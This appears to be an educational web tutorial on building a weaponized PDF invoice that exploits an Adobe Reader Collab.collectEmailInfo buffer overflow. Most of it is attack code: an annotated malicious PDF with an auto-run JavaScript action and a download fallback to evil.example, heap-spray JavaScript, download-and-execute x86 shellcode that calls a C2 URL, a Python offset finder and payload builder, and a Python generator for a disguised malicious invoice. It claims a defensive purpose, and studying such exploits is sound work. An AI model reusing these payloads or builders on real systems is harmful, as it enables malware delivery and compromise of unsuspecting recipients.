When a victim opens a weaponized PDF, the following chain of events fires automatically. Each phase takes milliseconds. The entire sequence — from file open to full code execution — completes in under 2 seconds. The user sees a normal invoice on screen the entire time.
/OpenAction 7 0 R in the Catalog. This tells Reader: "before displaying anything, execute the action in Object 7." Object 7 is a JavaScript action that references a compressed payload stream. No click required — the PDF specification explicitly allows this for "convenience features" like auto-print./FlateDecode) and executes the JavaScript inside. The script decodes shellcode from hex/unicode encoding, then allocates 200 JavaScript string objects, each ~1MB, filling ~200MB of heap memory with NOP-sled + shellcode copies. The heap is now a minefield: almost any address the CPU jumps to will land on attacker-controlled data.Collab.collectEmailInfo({subj: "A".repeat(0x4141)}). This Reader API has a stack buffer overflow — the oversized subject string (16,705 bytes) overwrites past the 256-byte buffer boundary, corrupting the saved frame pointer (EBP) and the return address (EIP) on the stack.0x0C0C0C0C — an address inside the sprayed heap region. When the vulnerable function executes ret, the CPU jumps to 0x0C0C0C0C. Because the heap is filled with NOP-sled + shellcode, the CPU lands on a NOP (0x90), slides forward through the NOP sled, and hits the shellcode. The attacker now controls execution.Below is the complete source code of a weaponized PDF file with every single object annotated. The 8 numbered comments reveal exactly where the attacker planted each trap. A legitimate PDF only needs Objects 1-6. Objects 7, 8, and 9 are the weapons the attacker added.
%PDF-1.4 /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ① THE TRAP DOOR (/OpenAction) This is Object 1 — the Catalog — the root of the entire PDF. It looks normal except for ONE added line: /OpenAction 7 0 R This tells the reader: "When you open this file, IMMEDIATELY execute whatever Object 7 says to do." The user never sees this happen. ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 1 0 obj << /Type /Catalog /Pages 2 0 R ← normal: points to the page tree /OpenAction 7 0 R ← ★ THE TRAP: auto-execute Object 7 on file open >> endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ② THE VISIBLE PAGES (Objects 2-6) These are 100% legitimate. They define the invoice the user sees on screen — fonts, layout, text content. Nothing suspicious. They exist solely to make the file look real. ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj 3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] ← US Letter size (612×792 points) /Contents 4 0 R /Resources << /Font << /F1 5 0 R >> >> >> endobj 4 0 obj ← page content stream (the visible invoice text) << /Length 342 >> stream BT /F1 16 Tf 50 750 Td (INVOICE #2024-0342) Tj /F1 10 Tf 50 720 Td (Acme Corp) Tj 50 700 Td (Total Due: $4,250.00) Tj ET endstream endobj 5 0 obj ← font definition << /Type /Font /Subtype /Type1 /BaseFont /Helvetica >> endobj 6 0 obj ← font descriptor (optional) << /Type /FontDescriptor /FontName /Helvetica >> endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ③ THE WEAPON (Object 7 — JavaScript Action) This is what /OpenAction points to. It tells the reader: "Run this JavaScript." The /JS key contains the actual code, and /Next chains to Object 8 for reliability (if Object 7 fails, try Object 8 instead). ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 7 0 obj << /Type /Action /S /JavaScript ← action type: execute JavaScript /JS 9 0 R ← the JavaScript code is in Object 9 (compressed) /Next 8 0 R ← backup: if this fails, try Object 8 next >> endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ④ THE EMBEDDED URL (Object 8 — Backup Action) A fallback action that launches a URI if the JavaScript route fails. Some PDF readers block JS but still allow URI actions. ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 8 0 obj << /Type /Action /S /URI /URI (https://evil.example/stage2.exe) ← direct download fallback >> endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ⑤ THE SHELLCODE + ⑥ NOP SLED + ⑦ HEAP SPRAY Object 9 is the compressed JavaScript stream. When decompressed (FlateDecode), it reveals the full exploit payload: shellcode definition, NOP sled generation, heap spray execution, and the vulnerability trigger function call. ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ 9 0 obj << /Length 4821 /Filter /FlateDecode ← compressed! Use pdf-parser to decompress >> stream [...4,821 bytes of zlib-compressed JavaScript... When decompressed, this becomes the heap spray + trigger code shown in the "JS Heap Spray" section below ] endstream endobj /* ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ⑧ THE TRIGGER (xref + trailer) The cross-reference table tells the reader where each object starts (byte offsets). The trailer points to the Catalog (Object 1) which starts the entire chain: Trailer → Catalog → /OpenAction → Object 7 → JavaScript → Object 9 → Heap Spray → Trigger Overflow → EIP Hijack → Shellcode ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ */ xref 0 10 0000000000 65535 f ← Object 0 (free — always present) 0000000009 00000 n ← Object 1 at byte 9 (Catalog + trap) 0000000115 00000 n ← Object 2 at byte 115 (Pages) 0000000169 00000 n ← Object 3 at byte 169 (Page) 0000000330 00000 n ← Object 4 at byte 330 (visible content) 0000000721 00000 n ← Object 5 at byte 721 (font) 0000000805 00000 n ← Object 6 at byte 805 (font descriptor) 0000000889 00000 n ← Object 7 at byte 889 (★ JS Action) 0000001052 00000 n ← Object 8 at byte 1052 (★ URI fallback) 0000001188 00000 n ← Object 9 at byte 1188 (★ compressed payload) trailer << /Size 10 /Root 1 0 R ← Start here → Catalog → /OpenAction → BOOM >> startxref 6009 ← byte offset of the xref table itself %%EOF
Legitimate: Objects 1-6 (Catalog, Pages, Page, Content, Font, FontDescriptor) — these render the invoice
Malicious: Object 7 (JS Action), Object 8 (URI Fallback), Object 9 (Compressed Payload) — these run the exploit
The Connection: One line in Object 1 (/OpenAction 7 0 R) bridges the gap between "document" and "weapon"
This is what's hiding inside Object 9 after decompression. Each of the 8 steps is annotated to show exactly what the JavaScript does, why it does it, and the math behind each operation.
// ═══════════════════════════════════════════════════ // STEP ① — THE SHELLCODE (the actual weapon) // This is raw machine code encoded as a JavaScript // string using %u (unicode escape) format. // When decoded: FC E8 82 00 00 00 60 89 E5 31 C0... // This code downloads & executes a remote payload. // ═══════════════════════════════════════════════════ var shellcode = unescape( "%ue8fc%u0082%u0000%u8960%u31e5%u64c0%u508b%u8b30" + "%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%u3cac" + "%u7c61%u2c02%ucf20%u0dc1%uc701%uf2e2%u5752%u528b" + "%u8b10%u3c4a%u4c8b%u7811%u48e3%ud101%u8b51%u2059" /* ... ~340 bytes total when decoded ... */ ); // MATH: Each %uXXYY = 2 bytes. The string has ~170 // %u sequences → 170 × 2 = 340 bytes of machine code. // In memory: FC E8 82 00 00 00 60 89 E5 31 C0 64... // ═══════════════════════════════════════════════════ // STEP ② — THE NOP SLED (the landing zone) // 0x0C = the NOP-equivalent byte. As a %u escape, // two 0x0C bytes = %u0c0c. This creates a tiny seed // string of NOP bytes that we'll exponentially grow. // ═══════════════════════════════════════════════════ var junk_code = unescape("%u0c0c%u0c0c"); // Result: 4 bytes → 0C 0C 0C 0C // This is the "seed" — we double it until it's huge. // ═══════════════════════════════════════════════════ // STEP ③ — NOP SLED EXPANSION (exponential doubling) // We double the NOP string in a loop until it reaches // 0x40000 (262,144) bytes. This takes only ~16 loops // because 4 × 2^16 = 262,144. Exponential growth! // ═══════════════════════════════════════════════════ while (junk_code.length < 0x40000) { junk_code += junk_code; // double the string each iteration } // Loop trace: // Start: 4 bytes // Loop 1: 8 bytes (4+4) // Loop 2: 16 bytes (8+8) // Loop 3: 32 bytes (16+16) // ... (doubles each iteration) // Loop 16: 262,144 bytes (0x40000) → STOP // Total: 262,144 bytes = 256 KB of 0C 0C 0C 0C... // ═══════════════════════════════════════════════════ // STEP ④ — ASSEMBLING THE SPRAY BLOCK // Each block = NOP sled (from step 3) + shellcode. // We trim the NOP sled so the total = exactly 1MB. // Block structure: [0C0C0C...×1MB-340B] [shellcode] // ═══════════════════════════════════════════════════ var spray_block = junk_code.substring(0, 0x40000 - shellcode.length); // MATH: 0x40000 = 262,144 bytes // 262,144 - 340 (shellcode) = 261,804 bytes of NOP sled // NOP % = 261,804 / 262,144 = 99.87% landing zone! spray_block += shellcode; // append the weapon at the end // Result: [0C 0C 0C 0C ... × 261,804 bytes ...] [FC E8 82 00 ...] // ← NOP sled (safe landing zone) → ← shellcode → // ═══════════════════════════════════════════════════ // STEP ⑤ — SPRAYING THE HEAP (filling memory) // We create 200 copies of the spray block in a JS // array. Each copy gets its own heap allocation. // 200 × 262,144 = 52,428,800 bytes ≈ 50MB minimum // (JS string overhead pushes actual usage to ~200MB) // ═══════════════════════════════════════════════════ var spray_array = new Array(); for (var i = 0; i < 200; i++) { spray_array[i] = spray_block.substring(0, spray_block.length); } // Each spray_array[i] holds a unique copy of the spray block. // .substring(0, length) forces a NEW string allocation each time // (prevents JS engine from just sharing a reference). // // After this loop, the process heap looks like: // [block 0][block 1][block 2]...[block 199] // Each block = 256KB of NOP+shellcode // Total sprayed = 200 × 256KB = ~50MB of raw data // With JS overhead: ~200MB of heap consumed // ═══════════════════════════════════════════════════ // STEP ⑥ — THE TARGET ADDRESS CHECK // Address 0x0C0C0C0C = 201,326,592 decimal // = ~192MB into the virtual address space. // Our spray covers addresses from ~50MB to ~250MB. // 192MB falls right in the middle → guaranteed hit! // ═══════════════════════════════════════════════════ // ═══════════════════════════════════════════════════ // STEP ⑦ — TRIGGER THE VULNERABILITY // Now we call a VULNERABLE Adobe Reader API with // a string that's way too long. This overflows an // internal buffer and overwrites EIP with 0x0C0C0C0C // (which is inside our sprayed heap region). // ═══════════════════════════════════════════════════ var evil_string = ""; for (var j = 0; j < 16705; j++) { evil_string += unescape("%u0c0c%u0c0c"); // fill with target address } // evil_string = 16,705 × 4 = 66,820 bytes of "0C 0C 0C 0C" // This is WAY more than the internal buffer can hold. // The overflow writes 0x0C0C0C0C over saved EIP on the stack. Collab.collectEmailInfo({subj: evil_string}); // ═══════════════════════════════════════════════════ // STEP ⑧ — WHAT HAPPENS NEXT (automatic) // 1. collectEmailInfo's internal buffer overflows // 2. Saved EIP on stack → overwritten with 0x0C0C0C0C // 3. Function returns → CPU jumps to 0x0C0C0C0C // 4. Address 0x0C0C0C0C is inside our sprayed heap! // 5. CPU executes NOP sled (0C 0C 0C 0C...) // 6. NOP sled slides to shellcode // 7. Shellcode: downloads and runs attacker's payload // 8. Game over — attacker has code execution // ═══════════════════════════════════════════════════
The PDF file (annotated above) contains Object 9 with 4,821 bytes of compressed data. When Adobe Reader decompresses it, the JavaScript code above is what executes. Steps ①-⑤ prepare the heap, Step ⑦ triggers the overflow, and Step ⑧ happens automatically. The entire process takes under 2 seconds. The user sees nothing but an invoice.
Four interactive labs. Each one lets you type real values and watch them appear in the exploit code — showing exactly how each component is built. Left side = safe/normal, right side = exploited. Everything is static text rendered in your browser. Nothing executes. Nothing touches your PC.
#include <stdio.h> #include <string.h> // THE GOAL: Attacker wants to force // the CPU to run this function. // In reality = shellcode download. void download_malware() { printf("COMPROMISED!\n"); } // THE VULNERABLE FUNCTION void parse_document(char *data) { char title_buffer[64]; // ⚠ THE VULNERABILITY: // No length check before copy! strcpy(title_buffer, data); // strcpy copies until \0 — if data // is longer than 64, it overflows // into the stack frame above. printf("Title: %s\n", title_buffer); } int main(int argc, char *argv[]) { // App receives "document" data parse_document(argv[1]); return 0; } // Normal input: "Quarterly Report" // → fits in 64 bytes, no overflow // // Attacker input: 64 bytes of junk // + 4 bytes (saved EBP) // + 4 bytes (return address → shellcode) // + NOP sled + shellcode // // When parse_document returns, EIP is // hijacked → CPU runs shellcode.
BEFORE (normal input "Quarterly Report")
AFTER (attacker's crafted input)
0x0c0c0c0c) overwrite the return address — when parse_document() executes ret, the CPU jumps to 0x0c0c0c0c instead of returning to main(). That address points to the NOP sled in the heap-sprayed memory, which slides into the shellcode. Game over.
%PDF-1.4 %% Object 1: Catalog (root of document) 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj %% Object 2: Page Tree 2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj %% Object 3: Page definition 3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Contents 5 0 R /Resources << /Font << /F1 4 0 R >> >> >> endobj %% Object 4: Font 4 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica >> endobj %% Object 5: Page content stream 5 0 obj << /Length 194 >> stream BT /F1 24 Tf 100 700 Td (INVOICE #2024-0582) Tj /F1 11 Tf 0 -30 Td (Acme Corp) Tj 0 -20 Td (Date: March 15, 2024) Tj 0 -40 Td (Security Audit ... $4,500) Tj 0 -18 Td (Pen Test .......... $3,200) Tj 0 -18 Td (Report ............ $1,800) Tj 0 -25 Td /F1 13 Tf (TOTAL: $9,500) Tj ET endstream endobj %% Object 6: Document Info 6 0 obj << /Title (Invoice) /Author (Acme Corp) >> endobj %% Cross-Reference Table xref 0 7 0000000000 65535 f 0000000009 00000 n ← Obj 1 at byte 9 0000000058 00000 n ← Obj 2 at byte 58 0000000115 00000 n ← Obj 3 at byte 115 0000000266 00000 n ← Obj 4 at byte 266 0000000333 00000 n ← Obj 5 at byte 333 0000000580 00000 n ← Obj 6 at byte 580 trailer << /Size 7 /Root 1 0 R /Info 6 0 R >> startxref 663 %%EOF
0x0c0c0c0c, it lands somewhere in the sprayed heap. The NOP sled "catches" the jump — no matter where in the block it lands, the CPU slides forward through NOPs until it hits the shellcode. Change the values below and watch the JavaScript code + memory visualization update.
WinExec or URLDownloadToFile. Below is an educational representation — the hex bytes map to real x86 instructions, annotated so you can see exactly what each byte does. This is display-only. Nothing executes.
calc.exe launches. In a real exploit, this would be cmd.exe /c powershell -ep bypass -c "IEX(...)" downloading a RAT. In our demo, it just opens Calculator. The entire chain: Buffer Overflow → Heap Spray → Shellcode → Payload.
Acme Corp — Consulting Services
Date: March 15, 2024
| Service | Amount |
|---|---|
| Security Audit | $4,500 |
| Pen Test | $3,200 |
| Report | $1,800 |
| TOTAL | $9,500 |
✓ 6 obj · 0 JS · 0 actions · 663 bytes · SAFE
Acme Corp — Consulting Services
Date: March 15, 2024
| Service | Amount |
|---|---|
| Security Audit | $4,500 |
| Pen Test | $3,200 |
| Report | $1,800 |
| TOTAL | $9,500 |
✓ 6 obj · 0 JS · 0 actions · 663 bytes · SAFE
This section walks through the complete exploit development pipeline — the exact sequence of steps an attacker follows to go from a vulnerability discovery to a fully weaponized PDF that compromises a target system. Each step builds on the previous one: write assembly → assemble to machine code → encode the bytes → craft the overflow buffer → assemble the full payload → embed it inside a PDF structure → test the execution chain.
Understanding this pipeline is critical for defenders because each step creates artifacts that can be detected. Assembly patterns, encoding signatures, heap spray behavior, and suspicious PDF objects all generate signals that security tools can match against. The 7 steps below show exactly what the attacker creates at each stage, what it looks like, and how it works.
The attacker first writes the payload as raw x86 assembly — the lowest-level human-readable code that maps directly to CPU instructions. This shellcode must be position-independent (it can run from any memory address) and self-contained (it cannot rely on import tables or linker-resolved symbols). The shellcode's job is typically to find the Windows API functions it needs (LoadLibraryA, GetProcAddress, URLDownloadToFileA), then use them to download and execute a second-stage payload from the attacker's server.
Why assembly? The attacker needs the raw machine code bytes — not a compiled executable with headers, sections, and import tables. Shellcode runs in the context of a hijacked process (Adobe Reader in our case), so it must locate system DLLs at runtime by walking the PEB (Process Environment Block), a data structure every Windows process has that contains the list of loaded modules and their base addresses.
; ────────────────────────────────────────────────── ; Shellcode: Download & Execute via URLDownloadToFileA ; Target: Windows x86 (32-bit) ; ────────────────────────────────────────────────── ; HOW THIS WORKS: ; 1. Walk the PEB to find kernel32.dll's base address ; 2. Parse kernel32's export table to find GetProcAddress ; 3. Use GetProcAddress to resolve LoadLibraryA ; 4. Load urlmon.dll using LoadLibraryA ; 5. Resolve URLDownloadToFileA from urlmon.dll ; 6. Call URLDownloadToFileA("http://c2/beacon.exe", "C:\Temp\b.exe") ; 7. Call WinExec("C:\Temp\b.exe") to execute the download ; ────────────────────────────────────────────────── _start: cld ; Clear direction flag call find_kernel32 ; Locate kernel32.dll base find_kernel32: xor eax, eax ; EAX = 0 mov eax, [fs:0x30] ; EAX = PEB (Process Environment Block) mov eax, [eax+0x0c] ; EAX = PEB->Ldr mov eax, [eax+0x14] ; EAX = Ldr->InMemOrderModList mov eax, [eax] ; Skip first entry (ntdll.dll) mov eax, [eax] ; Second entry = kernel32.dll mov eax, [eax+0x10] ; EAX = kernel32 base address resolve_api: ; Walk the Export Address Table to find functions mov ebx, [eax+0x3c] ; PE header offset add ebx, eax ; EBX = PE header mov ebx, [ebx+0x78] ; Export table RVA add ebx, eax ; EBX = Export table ; ... hash-based API resolution continues ... download_exec: ; Call URLDownloadToFileA("http://evil/payload.exe", "C:\\Temp\\a.exe") push 0 ; lpfnCB = NULL push 0 ; dwReserved = 0 push esi ; szFileName (local path) push edi ; szURL (remote URL) push 0 ; pCaller = NULL call [URLDownloadToFileA] ; Download the payload ; Execute the downloaded file push esi ; lpCommandLine call [WinExec] ; Run it
The assembler (NASM, MASM, or FASM) converts each assembly instruction into its raw byte opcode — the exact bytes the CPU will execute. This is the binary machine code. Each assembly instruction maps to a specific hex sequence defined by the Intel/AMD instruction set architecture. For example, cld (clear direction flag) always assembles to byte FC, and xor eax, eax (set EAX to zero) always assembles to 31 C0.
What the assembler produces: A flat binary file — just raw bytes, no ELF/PE headers, no sections, no imports. This is what makes shellcode different from a normal compiled program. The output is the exact sequence of bytes that will be injected into the exploit buffer and executed directly by the CPU.
; Address Opcodes Assembly Instruction ; ───────── ──────────────── ────────────────────────── 00000000 FC cld 00000001 E8 82 00 00 00 call find_kernel32 00000006 60 pushad 00000007 89 E5 mov ebp, esp 00000009 31 C0 xor eax, eax 0000000B 64 8B 50 30 mov eax, [fs:0x30] ; PEB 0000000F 8B 52 0C mov edx, [edx+0x0c] ; Ldr 00000012 8B 52 14 mov edx, [edx+0x14] 00000015 8B 72 28 mov esi, [edx+0x28] 00000018 0F B7 4A 26 movzx ecx, [edx+0x26] 0000001C 31 FF xor edi, edi 0000001E AC lodsb 0000001F 3C 61 cmp al, 0x61 ; ... more instructions ... ; The raw byte sequence (the shellcode) is: FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF AC 3C 61 7C 02 2C 20 C1 CF 0D 01 C7 E2 F2 52 57 8B 52 10 8B 4A 3C 8B 4C 11 78 E3 48 01 D1 51 8B 59 20
The raw opcodes from Step 2 must be encoded for delivery inside the exploit vehicle. Different exploit vectors require different encoding formats because the bytes must survive the transport mechanism. A PDF JavaScript payload uses Unicode escapes (%ue8fc) because JavaScript's unescape() function converts them back to raw bytes at runtime. An RTF exploit uses hex ASCII (fce882) because RTF \\objdata fields are parsed as hex digit pairs. Web-based delivery uses URL encoding (%FC%E8) because web servers decode these in transit.
Why encoding matters: The raw bytes (like 0x00 — a null byte) would break string-based transports. Encoding ensures every byte survives delivery. The exploit code on the receiving end decodes these back to the original raw bytes before executing them.
RAW BYTES (the opcodes from Step 2): FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30 8B HEX STRING (for Python/C injection): \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b URL ENCODED (for web-based delivery): %FC%E8%82%00%00%00%60%89%E5%31%C0%64%8B%50%30%8B UNICODE ESCAPE (for JavaScript heap spray): %ue8fc%u8200%u0000%u8960%u31e5%u64c0%u508b%u8b30 ↑ note: bytes are swapped in pairs (little-endian) ↑ FC E8 becomes %ue8fc (E8 first, then FC) BASE64 (for obfuscation in scripts): /OiCAAAAYInlMcBki1Awi... HEX ASCII (for RTF/OLE embedding): fce8820000006089e531c0648b50308b
Type any text below and watch it convert live into every hex encoding format attackers use. Below the output, a simulated PDF object view shows exactly how your encoded input would appear embedded inside a real PDF's internal structure — as a compressed JavaScript action stream.
This is the PDF object structure an attacker would create. Your input text is encoded with /FlateDecode compression and embedded as a JavaScript action stream. The /OpenAction in the Catalog triggers execution when the file opens.
/OpenAction in Object 1 tells the PDF reader to automatically run the JavaScript in Object 3, which references the payload stream in Object 4. The user opening this PDF would see a normal page — the malicious objects are invisible to the viewer.
This is the core of the exploit. The attacker needs to overflow a buffer so precisely that they overwrite the EIP (Extended Instruction Pointer) register — the 4-byte value on the stack that tells the CPU which address to return to when the current function finishes. If the attacker controls EIP, they control what code the CPU executes next.
How a buffer overflow works: When a function is called, the CPU pushes the return address (EIP) onto the stack. The function then allocates a local buffer (e.g., 256 bytes for a string). If the function copies more data into this buffer than it can hold (260+ bytes), the extra bytes "overflow" past the buffer's boundary and overwrite whatever is next on the stack — first the saved EBP (base pointer), then the saved EIP (return address). By carefully controlling the overflow, the attacker places a specific address in the EIP field. When the function tries to return, the CPU jumps to the attacker's chosen address instead of the legitimate caller.
Why 0x0C0C0C0C? In a heap spray exploit, the attacker fills hundreds of megabytes of heap memory with NOP-sled + shellcode copies. The address 0x0C0C0C0C (about 192MB into the address space) is very likely to land inside the sprayed region. Overwriting EIP with this address makes the CPU jump into the sprayed heap, where it slides through NOP instructions (0x90) until it hits the shellcode.
Here's how the attacker determines the exact offset to EIP — they use a cyclic pattern:
# Step 1: Generate a unique cyclic pattern # Every 4-byte sequence is unique, so when the app crashes, # the value in EIP tells us the exact offset from struct import pack # Generate pattern: Aa0Aa1Aa2Aa3Ab0Ab1Ab2... def cyclic(length): pattern = "" for upper in "ABCDEFGHIJKLMNOP": for lower in "abcdefghijklmnop": for digit in "0123456789": pattern += upper + lower + digit if len(pattern) >= length: return pattern[:length] return pattern # Send this to the vulnerable app payload = cyclic(500) # App crashes → debugger shows: EIP = 0x39624138 # Lookup: "8Ab9" at offset 260 in the pattern # → Buffer is 260 bytes before we hit EIP! OFFSET = 260 # exact bytes to reach EIP
Now the attacker combines everything from the previous steps into a single binary string — the exploit buffer. This buffer is laid out with surgical precision: exactly 260 bytes of junk (to fill the vulnerable buffer), then exactly 4 bytes that overwrite EIP with the heap spray address, then 64 bytes of NOP sled (a safety margin), then the shellcode itself. Every byte is in the exact right position. If a single byte is off, the exploit crashes the target instead of compromising it.
What this generates: A raw binary payload of ~670 bytes. The junk data fills the buffer; the EIP overwrite redirects execution; the NOP sled absorbs any address imprecision; and the shellcode does the actual work (download + execute a backdoor). This is the data that will be embedded in the PDF's JavaScript heap spray.
import struct # ── Configuration ── OFFSET = 260 # Bytes to reach saved EIP (from Step 4) EIP_ADDR = 0x0C0C0C0C # Target: heap spray address NOP_SIZE = 64 # NOP sled padding (safety margin) # ── Shellcode (from Step 2, hex-encoded) ── shellcode = ( b"\xfc\xe8\x82\x00\x00\x00\x60\x89" # cld; call; pushad b"\xe5\x31\xc0\x64\x8b\x50\x30\x8b" # PEB walk b"\x52\x0c\x8b\x52\x14\x8b\x72\x28" # Ldr modules b"\x0f\xb7\x4a\x26\x31\xff\xac\x3c" # API resolution # ... ~300 more bytes ... b"\x57\x69\x6e\x45\x78\x65\x63\x00" # "WinExec\0" ) # ── Build the exploit buffer ── payload = b"A" * OFFSET # ← JUNK (fills buffer) payload += struct.pack("<I", EIP_ADDR) # ← EIP overwrite (4 bytes) payload += b"\x90" * NOP_SIZE # ← NOP sled (0x90 = NOP) payload += shellcode # ← The actual shellcode # Visual breakdown: # [AAAA...AAAA] [0C0C0C0C] [90909090...] [FCE88200...] # ← 260 bytes → ← 4 bytes → ← 64 bytes → ← ~342 bytes → # JUNK EIP NOP SLED SHELLCODE print(f"Payload size: {len(payload)} bytes") print(f" Junk: {OFFSET} bytes") print(f" EIP: 4 bytes → {hex(EIP_ADDR)}") print(f" NOP sled: {NOP_SIZE} bytes") print(f" Shellcode: {len(shellcode)} bytes")
The attacker uses Python to construct a malicious PDF from scratch — building each object manually and wiring them together. This is the step where the shellcode from Step 5 gets wrapped inside JavaScript (for heap spray delivery), compressed with zlib (FlateDecode), and embedded as a PDF stream object. The PDF's Catalog object gets a /OpenAction entry pointing to a JavaScript Action object that references the compressed stream. When Adobe Reader opens this file, it follows the chain: Catalog → /OpenAction → JavaScript Action → decompress stream → execute JavaScript → heap spray → trigger vuln → shellcode runs.
What this generates: A complete, valid PDF file (Invoice_March_2024.pdf) that any PDF reader will open without error. It displays normal content on screen while the hidden JavaScript payload executes in the background. The Python code below shows every line needed to generate this file — each PDF object is built as raw bytes and concatenated together.
import zlib import struct # ── Convert shellcode to JavaScript unescape format ── def to_js_unescape(shellcode_bytes): """Convert raw bytes to %uXXXX format (little-endian pairs)""" js = "" for i in range(0, len(shellcode_bytes), 2): if i + 1 < len(shellcode_bytes): # Swap bytes for little-endian: AB CD → %uCDAB js += f"%u{shellcode_bytes[i+1]:02x}{shellcode_bytes[i]:02x}" else: js += f"%u00{shellcode_bytes[i]:02x}" return js # ── Build the malicious JavaScript ── sc_js = to_js_unescape(shellcode) js_code = f""" var sc = unescape("{sc_js}"); // Heap spray: fill memory with NOP sled + shellcode var nop = unescape("%u0c0c%u0c0c"); while (nop.length < 0x100000) nop += nop; var block = nop.substring(0, 0x100000 - sc.length); var spray = new Array(); for (var i = 0; i < 200; i++) {{ spray[i] = block + sc; }} // Trigger the vulnerability Collab.collectEmailInfo({{subj: "A".repeat(0x4141)}}); """ # ── Compress the JavaScript (FlateDecode) ── js_compressed = zlib.compress(js_code.encode('latin-1')) # ── Build the PDF structure ── pdf = b"%PDF-1.7\n" # Object 1: Catalog with /OpenAction (auto-execute trigger) pdf += b"1 0 obj\n" pdf += b"<< /Type /Catalog /Pages 2 0 R" pdf += b" /OpenAction 4 0 R" # ← auto-runs on open! pdf += b" >>\nendobj\n\n" # Object 2: Pages pdf += b"2 0 obj\n" pdf += b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>\n" pdf += b"endobj\n\n" # Object 3: Page (shows innocent invoice content) pdf += b"3 0 obj\n" pdf += b"<< /Type /Page /Parent 2 0 R" pdf += b" /MediaBox [0 0 612 792] >>\n" pdf += b"endobj\n\n" # Object 4: JavaScript Action (the exploit!) pdf += b"4 0 obj\n" pdf += b"<< /Type /Action /S /JavaScript /JS 5 0 R >>\n" pdf += b"endobj\n\n" # Object 5: Compressed JavaScript stream (FlateDecode) pdf += b"5 0 obj\n" pdf += f"<< /Length {len(js_compressed)}".encode() pdf += b" /Filter /FlateDecode >>\n" pdf += b"stream\n" pdf += js_compressed # ← hex bytes! pdf += b"\nendstream\nendobj\n\n" # Write the xref table and trailer pdf += b"xref\n0 6\n" pdf += b"trailer << /Size 6 /Root 1 0 R >>\n" pdf += b"%%EOF" # ── Save the weaponized PDF ── with open("Invoice_March_2024.pdf", "wb") as f: f.write(pdf) print("[+] Malicious PDF generated: Invoice_March_2024.pdf") print(f"[+] JavaScript payload: {len(js_code)} bytes") print(f"[+] Compressed stream: {len(js_compressed)} bytes") print(f"[+] Total PDF size: {len(pdf)} bytes")
This is the moment of truth. The victim double-clicks Invoice_March_2024.pdf in their email. Adobe Reader opens it and displays a normal-looking invoice page. But in the background, at CPU speed (billions of operations per second), the exploit chain fires. The trace below shows every step the CPU takes — from parsing the PDF header, to traversing the object tree, to decompressing and executing JavaScript, to spraying the heap, to triggering the vulnerability that overwrites EIP, to the shellcode walking the PEB to find Windows APIs, to the final download-and-execute of the attacker's backdoor. Each line is a real event in the process.
Why this is hard to detect: Everything happens within the legitimate AcroRd32.exe process. No new .exe is dropped until the very end. The JavaScript runs inside Adobe Reader's embedded SpiderMonkey engine. The heap spray uses normal memory allocation calls. The vulnerability trigger (Collab.collectEmailInfo) is a legitimate PDF API function. Only the final HTTP download and child process spawn create detectable external artifacts.
──── PDF OPEN ──── [AcroRd32] Parsing %PDF-1.7 header... OK [AcroRd32] Loading object 1 (Catalog) [AcroRd32] Found /OpenAction → Object 4 [AcroRd32] Object 4: /Action /JavaScript → Object 5 [AcroRd32] Object 5: FlateDecode stream, decompressing... ──── JAVASCRIPT ENGINE ──── [SpiderMonkey] Executing decoded JavaScript... [SpiderMonkey] unescape() → 342 bytes of shellcode decoded [SpiderMonkey] Heap spray: allocating 200 × 1MB blocks... [SpiderMonkey] Memory at 0x0C0C0C0C: 0C 0C 0C 0C 0C 0C ... ✓ ──── VULNERABILITY TRIGGER ──── [SpiderMonkey] Calling Collab.collectEmailInfo() [AcroRd32] BUFFER OVERFLOW in CollabEmailInfo() [AcroRd32] Stack: ESP: 0x0012F8A0 [41 41 41 41 41 41 41 41] ← junk EBP: 0x41414141 [overwritten with AAAA] ← junk EIP: 0x0C0C0C0C [overwritten by attacker!] ← HIJACKED ──── CPU FOLLOWS EIP ──── [CPU] EIP = 0x0C0C0C0C → jumping to heap... [CPU] Executing: 0C 0C → OR AL, 0x0C (harmless NOP) [CPU] Executing: 0C 0C → OR AL, 0x0C (harmless NOP) [CPU] Executing: 0C 0C → OR AL, 0x0C (sliding...) [CPU] ...sliding through NOP sled... [CPU] HIT SHELLCODE at 0x0C0D0000 [CPU] FC → cld [CPU] E8 82 00 → call find_kernel32 [CPU] 60 → pushad [CPU] 89 E5 → mov ebp, esp [CPU] 31 C0 → xor eax, eax [CPU] 64 8B 50 30 → mov eax, [fs:0x30] ; PEB ... resolving APIs ... downloading payload ... [CPU] WinExec("C:\\Temp\\backdoor.exe") → GAME OVER
Here's the final payload laid out byte-by-byte, exactly as it exists in memory when the overflow happens:
Watch the complete exploit generation pipeline — from assembly to encoded hex to PDF injection — all in one animated sequence.
